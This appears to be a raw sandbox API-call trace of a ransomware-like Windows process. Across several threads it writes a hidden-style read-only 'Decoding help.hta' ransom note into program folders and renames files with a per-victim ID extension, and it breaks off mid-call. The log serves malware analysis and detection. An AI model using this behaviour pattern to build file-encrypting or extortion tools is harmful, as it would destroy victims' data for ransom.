hFindFile=0x245585a8, lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5879c0ca, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x5879c0ca, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x77f7dd5c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xd76, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client.xml", cAlternateFileName="")) returned 1 [0060.254] lstrcpyW (in: lpString1=0x972a1d8, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*" [0060.254] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*") returned 87 [0060.254] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Decoding help.hta" [0060.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\decoding help.hta")) returned 0xffffffff [0060.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd64 [0061.480] WriteFile (in: hFile=0xd64, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20c5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.481] CloseHandle (hObject=0xd64) returned 1 [0061.481] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Client.xml") returned 1 [0061.481] lstrlenW (lpString="Client.xml") returned 10 [0061.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*" [0061.481] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*") returned 87 [0061.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\", lpString2="Client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" [0061.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" [0061.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.482] FindNextFileW (in: hFindFile=0x245585a8, lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5879c0ca, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x5879c0ca, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x77f7dd5c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xd76, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client.xml", cAlternateFileName="")) returned 0 [0061.482] FindClose (in: hFindFile=0x245585a8 | out: hFindFile=0x245585a8) returned 1 Thread: id = 981 os_tid = 0x904 [0060.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*", lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x24022fc4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245585e8 [0060.255] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.255] FindNextFileW (in: hFindFile=0x245585e8, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x24022fc4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.826] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.826] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.826] FindNextFileW (in: hFindFile=0x245585e8, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x24022fc4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.826] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.826] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.826] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.902] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0060.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 71 [0060.903] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" [0060.903] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" [0060.903] GlobalMemoryStatus (in: lpBuffer=0x2141fd10 | out: lpBuffer=0x2141fd10) [0060.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a63000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa8c [0064.502] CloseHandle (hObject=0xa8c) returned 1 [0064.502] FindNextFileW (in: hFindFile=0x245585e8, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 Thread: id = 982 os_tid = 0x41c [0060.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*", lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558628 [0060.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.257] FindNextFileW (in: hFindFile=0x24558628, lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.257] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.257] FindNextFileW (in: hFindFile=0x24558628, lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b43b7f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85b43b7f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3d468497, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd86, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.png", cAlternateFileName="")) returned 1 [0060.257] lstrcpyW (in: lpString1=0x10d8ec28, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0060.257] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 72 [0060.257] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0060.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.482] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x21b4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x21b4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.483] CloseHandle (hObject=0xd3c) returned 1 [0061.483] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.483] lstrcmpiW (lpString1="Decoding help.hta", lpString2="blank.png") returned 1 [0061.483] lstrlenW (lpString="blank.png") returned 9 [0061.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0061.483] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 72 [0061.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="blank.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" [0061.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" [0061.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.484] FindNextFileW (in: hFindFile=0x24558628, lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="in_sidebar", cAlternateFileName="IN_SID~1")) returned 1 [0061.484] lstrcmpW (lpString1=".", lpString2="in_sidebar") returned -1 [0061.484] lstrcmpW (lpString1="..", lpString2="in_sidebar") returned -1 [0061.484] lstrcmpiW (lpString1="windows", lpString2="in_sidebar") returned 1 [0061.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0061.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 72 [0061.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="in_sidebar" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" [0061.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*" [0061.484] GlobalMemoryStatus (in: lpBuffer=0x21b4fd10 | out: lpBuffer=0x21b4fd10) [0063.796] CreateThread (lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0) Thread: id = 983 os_tid = 0xa14 [0060.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*", lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22c02035, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558668 [0060.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.261] FindNextFileW (in: hFindFile=0x24558668, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22c02035, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.261] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.261] FindNextFileW (in: hFindFile=0x24558668, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22c02035, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.261] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.261] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.261] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.261] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0060.261] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 69 [0060.261] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" [0060.261] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" [0060.261] GlobalMemoryStatus (in: lpBuffer=0x21dcfd10 | out: lpBuffer=0x21dcfd10) [0060.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245d9130, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0063.862] CloseHandle (hObject=0x2f4) returned 1 [0063.862] FindNextFileW (in: hFindFile=0x24558668, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 Thread: id = 984 os_tid = 0x324 [0060.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*", lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8052fafa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8052fafa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558728 [0060.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.267] FindNextFileW (in: hFindFile=0x24558728, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8052fafa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8052fafa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.271] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.271] FindNextFileW (in: hFindFile=0x24558728, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a640bd5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x2a640bd5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2a640bd5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0060.272] lstrcpyW (in: lpString1=0x24a0e030, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0060.272] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 70 [0060.272] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0060.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.501] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2254fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, 